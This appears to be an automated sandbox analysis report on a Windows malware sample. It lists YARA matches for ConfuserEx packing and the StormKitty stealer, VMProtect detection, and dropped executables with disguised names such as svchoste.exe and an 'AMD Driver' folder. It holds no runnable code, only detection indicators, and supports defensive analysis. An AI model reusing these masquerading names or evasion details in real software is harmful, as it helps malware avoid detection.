Source: Yara match	File source: 00000008.00000002.406228414.0000000002691000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: chormuim.exe PID: 6504, type: MEMORYSTR

System Summary:

Detected VMProtect packer

Show sources

Source: AnonFileApi.dll.8.dr

Static PE information: .vmp0 and .vmp1 section names

.NET source code contains very large strings

Show sources

Source: dll.exe.0.dr, Forms.cs	Long String: Length: 14336
Source: 5.2.dll.exe.10000.0.unpack, Forms.cs	Long String: Length: 14336
Source: 5.0.dll.exe.10000.0.unpack, Forms.cs	Long String: Length: 14336

Source: C:\Users\user\AppData\Local\Temp\chormuim.exe

Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6504 -s 1360

Source: C:\Users\user\Desktop\18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe	Code function: 0_2_0096D4C4	0_2_0096D4C4
Source: C:\Users\user\Desktop\18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe	Code function: 0_2_0096E5BE	0_2_0096E5BE
Source: C:\Users\user\Desktop\18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe	Code function: 0_2_0096CDCC	0_2_0096CDCC
Source: C:\Users\user\Desktop\18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe	Code function: 0_2_00961D11	0_2_00961D11
Source: C:\Users\user\Desktop\18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe	Code function: 0_2_00007FFC08955E77	0_2_00007FFC08955E77
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe	Code function: 4_2_00B83C90	4_2_00B83C90
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe	Code function: 4_2_00B83480	4_2_00B83480
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe	Code function: 4_2_00B83060	4_2_00B83060
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe	Code function: 4_2_00B83AA0	4_2_00B83AA0
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe	Code function: 4_2_00B74B10	4_2_00B74B10
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe	Code function: 6_2_00408C60	6_2_00408C60
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe	Code function: 6_2_0040DC11	6_2_0040DC11
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe	Code function: 6_2_00407C3F	6_2_00407C3F
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe	Code function: 6_2_00418CCC	6_2_00418CCC
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe	Code function: 6_2_00406CA0	6_2_00406CA0
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe	Code function: 6_2_004028B0	6_2_004028B0
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe	Code function: 6_2_0041A4BE	6_2_0041A4BE
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe	Code function: 6_2_00418244	6_2_00418244
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe	Code function: 6_2_00401650	6_2_00401650
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe	Code function: 6_2_00402F20	6_2_00402F20
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe	Code function: 6_2_004193C4	6_2_004193C4
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe	Code function: 6_2_00418788	6_2_00418788
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe	Code function: 6_2_00402F89	6_2_00402F89
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe	Code function: 6_2_00402B90	6_2_00402B90
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe	Code function: 6_2_004073A0	6_2_004073A0
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe	Code function: 6_2_021F04DA	6_2_021F04DA
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe	Code function: 6_2_021F0D00	6_2_021F0D00
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe	Code function: 6_2_021F6389	6_2_021F6389
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe	Code function: 6_2_021FA19A	6_2_021FA19A
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe	Code function: 6_2_021F11B0	6_2_021F11B0
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe	Code function: 6_2_021FA1A8	6_2_021FA1A8
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe	Code function: 6_2_021F11A0	6_2_021F11A0
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe	Code function: 6_2_021F0CF2	6_2_021F0CF2
Source: C:\ProgramData\AMD Driver\taskshell.exe	Code function: 7_2_00E6E040	7_2_00E6E040
Source: C:\ProgramData\AMD Driver\taskshell.exe	Code function: 7_2_00E6E030	7_2_00E6E030
Source: C:\ProgramData\AMD Driver\taskshell.exe	Code function: 7_2_00E6B7AC	7_2_00E6B7AC
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe	Code function: 8_2_00007FFC089D5ED9	8_2_00007FFC089D5ED9
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe	Code function: 8_2_00007FFC089D0819	8_2_00007FFC089D0819
Source: C:\ProgramData\AMD Driver\taskshell.exe	Code function: 12_2_017EE040	12_2_017EE040
Source: C:\ProgramData\AMD Driver\taskshell.exe	Code function: 12_2_017EE030	12_2_017EE030
Source: C:\ProgramData\AMD Driver\taskshell.exe	Code function: 12_2_017EB7AC	12_2_017EB7AC
Source: C:\ProgramData\AMD Driver\taskshell.exe	Code function: 12_2_0567D318	12_2_0567D318
Source: C:\ProgramData\AMD Driver\taskshell.exe	Code function: 12_2_05674C30	12_2_05674C30
Source: C:\ProgramData\AMD Driver\taskshell.exe	Code function: 12_2_05676EDB	12_2_05676EDB
Source: C:\ProgramData\AMD Driver\taskshell.exe	Code function: 16_2_0246E010	16_2_0246E010
Source: C:\ProgramData\AMD Driver\taskshell.exe	Code function: 16_2_0246E020	16_2_0246E020
Source: C:\ProgramData\AMD Driver\taskshell.exe	Code function: 16_2_0246B78C	16_2_0246B78C
Source: C:\ProgramData\AMD Driver\taskshell.exe	Code function: 16_2_056FD318	16_2_056FD318
Source: C:\ProgramData\AMD Driver\taskshell.exe	Code function: 16_2_056F4C30	16_2_056F4C30
Source: C:\ProgramData\AMD Driver\taskshell.exe	Code function: 16_2_056F6EDB	16_2_056F6EDB
Source: C:\ProgramData\AMD Driver\taskshell.exe	Code function: 16_2_056F4BD9	16_2_056F4BD9

Source: 18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: chormuim.exe.6.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: C:\Windows\System32\msiexec.exe

Section loaded: sfc.dll

Source: sqlite3.dll.4.dr

Static PE information: Number of sections : 19 > 10

Source: 18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED

Source: 8.2.chormuim.exe.280000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: 8.2.chormuim.exe.280000.0.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_StormKitty date = 2020-12-13, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/LimerBoy/StormKitty, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.2.chormuimii.exe.37fd950.7.unpack, type: UNPACKEDPE	Matched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: 6.2.chormuimii.exe.37fd950.7.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_StormKitty date = 2020-12-13, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/LimerBoy/StormKitty, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 8.0.chormuim.exe.280000.6.unpack, type: UNPACKEDPE	Matched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: 8.0.chormuim.exe.280000.6.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_StormKitty date = 2020-12-13, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/LimerBoy/StormKitty, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.2.chormuimii.exe.36cb892.6.unpack, type: UNPACKEDPE	Matched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: 6.2.chormuimii.exe.36cb892.6.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_StormKitty date = 2020-12-13, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/LimerBoy/StormKitty, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.2.chormuimii.exe.4bb6362.12.unpack, type: UNPACKEDPE	Matched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: 6.2.chormuimii.exe.4bb6362.12.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_StormKitty date = 2020-12-13, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/LimerBoy/StormKitty, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.2.chormuimii.exe.37fd950.7.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: 6.2.chormuimii.exe.37fd950.7.raw.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_StormKitty date = 2020-12-13, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/LimerBoy/StormKitty, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.2.chormuimii.exe.4b05400.8.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: 6.2.chormuimii.exe.4b05400.8.raw.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_StormKitty date = 2020-12-13, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/LimerBoy/StormKitty, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.2.chormuimii.exe.4af0000.10.unpack, type: UNPACKEDPE	Matched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: 6.2.chormuimii.exe.4af0000.10.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_StormKitty date = 2020-12-13, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/LimerBoy/StormKitty, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.2.chormuimii.exe.36b5530.4.unpack, type: UNPACKEDPE	Matched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: 6.2.chormuimii.exe.36b5530.4.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_StormKitty date = 2020-12-13, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/LimerBoy/StormKitty, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.2.chormuimii.exe.4ba0f62.13.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: 6.2.chormuimii.exe.4ba0f62.13.raw.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_StormKitty date = 2020-12-13, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/LimerBoy/StormKitty, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 8.0.chormuim.exe.730000.7.unpack, type: UNPACKEDPE	Matched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: 8.0.chormuim.exe.730000.7.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_StormKitty date = 2020-12-13, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/LimerBoy/StormKitty, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 8.2.chormuim.exe.730000.1.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: 8.2.chormuim.exe.730000.1.raw.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_StormKitty date = 2020-12-13, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/LimerBoy/StormKitty, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.2.chormuimii.exe.36b5530.4.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: 6.2.chormuimii.exe.36b5530.4.raw.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_StormKitty date = 2020-12-13, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/LimerBoy/StormKitty, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.2.chormuimii.exe.4af0000.10.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: 6.2.chormuimii.exe.4af0000.10.raw.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_StormKitty date = 2020-12-13, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/LimerBoy/StormKitty, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.2.chormuimii.exe.36b6492.5.unpack, type: UNPACKEDPE	Matched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: 6.2.chormuimii.exe.36b6492.5.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_StormKitty date = 2020-12-13, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/LimerBoy/StormKitty, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.2.chormuimii.exe.23ad390.2.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: 6.2.chormuimii.exe.23ad390.2.raw.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_StormKitty date = 2020-12-13, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/LimerBoy/StormKitty, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.2.chormuimii.exe.36b6492.5.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: 6.2.chormuimii.exe.36b6492.5.raw.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_StormKitty date = 2020-12-13, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/LimerBoy/StormKitty, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 8.0.chormuim.exe.280000.3.unpack, type: UNPACKEDPE	Matched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: 8.0.chormuim.exe.280000.3.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_StormKitty date = 2020-12-13, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/LimerBoy/StormKitty, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 8.0.chormuim.exe.280000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: 8.0.chormuim.exe.280000.0.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_StormKitty date = 2020-12-13, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/LimerBoy/StormKitty, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.2.chormuimii.exe.4ba0000.14.unpack, type: UNPACKEDPE	Matched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: 6.2.chormuimii.exe.4ba0000.14.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_StormKitty date = 2020-12-13, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/LimerBoy/StormKitty, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.2.chormuimii.exe.4b05400.8.unpack, type: UNPACKEDPE	Matched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: 6.2.chormuimii.exe.4b05400.8.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_StormKitty date = 2020-12-13, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/LimerBoy/StormKitty, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 8.0.chormuim.exe.730000.4.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: 8.0.chormuim.exe.730000.4.raw.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_StormKitty date = 2020-12-13, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/LimerBoy/StormKitty, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 8.0.chormuim.exe.730000.7.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: 8.0.chormuim.exe.730000.7.raw.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_StormKitty date = 2020-12-13, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/LimerBoy/StormKitty, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.2.chormuimii.exe.2397f90.3.unpack, type: UNPACKEDPE	Matched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: 6.2.chormuimii.exe.2397f90.3.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_StormKitty date = 2020-12-13, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/LimerBoy/StormKitty, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.2.chormuimii.exe.4bb6362.12.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: 6.2.chormuimii.exe.4bb6362.12.raw.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_StormKitty date = 2020-12-13, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/LimerBoy/StormKitty, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 8.2.chormuim.exe.730000.1.unpack, type: UNPACKEDPE	Matched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: 8.2.chormuim.exe.730000.1.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_StormKitty date = 2020-12-13, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/LimerBoy/StormKitty, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 8.0.chormuim.exe.280000.2.unpack, type: UNPACKEDPE	Matched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: 8.0.chormuim.exe.280000.2.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_StormKitty date = 2020-12-13, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/LimerBoy/StormKitty, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.2.chormuimii.exe.4ba0f62.13.unpack, type: UNPACKEDPE	Matched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: 6.2.chormuimii.exe.4ba0f62.13.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_StormKitty date = 2020-12-13, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/LimerBoy/StormKitty, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.2.chormuimii.exe.2397f90.3.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: 6.2.chormuimii.exe.2397f90.3.raw.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_StormKitty date = 2020-12-13, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/LimerBoy/StormKitty, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.2.chormuimii.exe.23ad390.2.unpack, type: UNPACKEDPE	Matched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: 6.2.chormuimii.exe.23ad390.2.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_StormKitty date = 2020-12-13, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/LimerBoy/StormKitty, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 8.0.chormuim.exe.730000.4.unpack, type: UNPACKEDPE	Matched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: 8.0.chormuim.exe.730000.4.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_StormKitty date = 2020-12-13, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/LimerBoy/StormKitty, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 8.0.chormuim.exe.280000.1.unpack, type: UNPACKEDPE	Matched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: 8.0.chormuim.exe.280000.1.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_StormKitty date = 2020-12-13, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/LimerBoy/StormKitty, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.2.chormuimii.exe.4ba0000.14.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
